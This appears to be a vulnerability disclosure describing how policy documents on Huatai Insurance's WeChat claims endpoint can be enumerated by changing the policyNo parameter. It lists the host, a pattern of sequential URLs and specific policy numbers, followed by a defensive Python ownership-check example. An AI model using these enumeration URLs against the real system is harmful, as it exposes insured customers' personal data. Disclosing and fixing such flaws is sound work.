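Improper design in a Huatai Insurance system leaks users' policies and other detailed information
Improper system design
Huatai WeChat self-service claims
Address: https://202.108.103.169/htweixin/
At a policy download endpoint, users' policy information can be enumerated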
https://202.108.103.169/htweixin/InsuranceDownload.action?policyNo=WB251646043215001577
https://202.108.103.169/htweixin/InsuranceDownload.action?policyNo=WB251646043215001576
https://202.108.103.169/htweixin/InsuranceDownload.action?policyNo=WB251646043215001578
Iterating over policyNo is all that is needed
https://202.108.103.169/htweixin/InsuranceDownload.action?policyNo=WB251646043215002568
https://202.108.103.169/htweixin/InsuranceDownload.action?policyNo=WB251646043215001565
The ones above are overseas policies; below is the naming pattern for domestic policies
https://202.108.103.169/htweixin/InsuranceDownload.action?policyNo=A0011668120000000132
https://202.108.103.169/htweixin/InsuranceDownload.action?policyNo=A0011668120000000131
https://202.108.103.169/htweixin/InsuranceDownload.action?policyNo=A0011668120000000127
Solution:
Add a check
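One form the check can take, as an added example that is not code from the original report or from the affected system: the download handler returns a policy only when it belongs to the logged-in user, answers unknown and foreign policy numbers identically, and records refusals so that enumeration shows up in the audit trail. The data store, session shape, class names and the refusal threshold are all assumptions made for illustration.

```python
from collections import defaultdict

# Constructed sample data; policy numbers and account ids are made up.
POLICY_OWNER = {"TEST-0001": "alice", "TEST-0002": "bob", "TEST-0003": "bob"}
POLICY_PDF = {no: f"%PDF-1.4 policy {no}".encode() for no in POLICY_OWNER}

MAX_DENIALS = 3  # assumed threshold before a user's lookups are blocked


class DownloadDenied(Exception):
    """Raised with an HTTP-style status instead of returning the document."""
    def __init__(self, status):
        super().__init__(status)
        self.status = status


class PolicyDownloadGuard:
    def __init__(self):
        self.denials = defaultdict(int)  # user id -> count of refused requests
        self.audit = []                  # (user id, policy number) per refusal

    def download(self, session, policy_no):
        user = session.get("user_id")
        if user is None:
            raise DownloadDenied(401)    # no authenticated session
        if self.denials[user] >= MAX_DENIALS:
            raise DownloadDenied(429)    # too many refused lookups
        # Ownership check: the policy must belong to the session's user.
        # Unknown and foreign numbers get the same 404, so the response
        # does not reveal which policy numbers exist.
        if POLICY_OWNER.get(policy_no) != user:
            self.denials[user] += 1
            self.audit.append((user, policy_no))
            raise DownloadDenied(404)
        return POLICY_PDF[policy_no]


def status_of(guard, session, policy_no):
    """Demonstration helper: return 200 or the refusal status."""
    try:
        guard.download(session, policy_no)
        return 200
    except DownloadDenied as exc:
        return exc.status
```
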